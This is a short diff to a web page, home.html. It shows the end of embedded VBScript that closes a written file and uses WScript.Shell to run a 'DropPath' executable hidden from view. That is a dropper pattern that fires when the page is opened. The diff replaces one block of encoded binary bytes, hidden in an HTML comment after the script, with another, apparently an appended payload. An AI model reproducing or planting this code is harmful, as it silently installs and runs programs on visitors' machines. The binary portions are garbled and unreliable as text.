--- a/home.html
+++ b/home.html
@@ -42,12 +42,5 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--0JÌcöd‹zè« ˜Òøz¹Îo‚Ö|G¤çùc³?¸Y’FfH©#ŒÁùÎÊ¯|Á*7£áÛo¼¹ŽYñ’µ*ÞjÝÀhvöù†\tI:I¼¼h4å ÈÅ´?~ª;åì\ÔÄï÷÷AÞ&µ§~'ÃT©,Qx
-	c œb%žÆ®5Ù‡2zíÎ\wª%½½­ç®/ÊCÀ”mco«Ã™üðÜá¾ql©NGTr2?@h'Ø§–*½~¢É!aBÌ÷á‚
-u*ÌÁÅ[\@ˆñÑôµ¦‡«á„ÞfýFVx®ÃwBÃ*?óú™U´¿¡ €¬Í»Ÿ‡s3›)7…Òüç\/dïØAe	Œéƒ']ž†äHœô®Õ_‹SeíyÊ·lMÌ^èk![ÔDÜ ¸;%²þr2öv0Gh	Šê	Ýv”ÓDøÊûu“.l~{ Ü
-RùÜ
-Ü
-Ü
-‘×OeþØZÆß
- Ü
--->
+//--></SCRIPT><!--{+„É}Ïv‰ôÕÎÛÜýñ¾ããg/è}ä8¯xûb¥³ü+K,¬6Q‡T6RhZD{›²ŽX›¦cÄæn¿{
+…ââé€¹"f³ù» Ûs×1h‹R`£îwËÂ.F»e|¨ùÙS‘!êý?æ{®$2jq©í±¾‡va¤~%\&z•åSQoô'S‰bÄßùÎ ûZ·;ªâû¹Z=:²J-\FãßÄ¿ª—^Ò™|EAˆ1ÉáØ#Æô0¥àž[(œ;·ù ‰¹'¿. –°©öZºò¸Õ»²e–‘'€ípn™$ «ÜUÎÕÌO÷Œ1þH˜§ò\ÅSVmn7JßvÊ–4/>DË&wh¿œ”uöì’Nõä¼‹“èŒÚ^·ùS¼9ë=9êP÷$(î;—W1f»®VGÎ×†°­Ñ©€mï…kyñÓ·ÌUÐ¼ŸãÞú2À†‚Îpê'Ö œ‡ã*%_3¶Éð¬qa•#Îìn¬gBIXÑ`ˆÜn>¤ïÉVÁÃ‡t¥ª;#šö á(R"3ùá(á(á(¬õO úZÆâ( á(-->
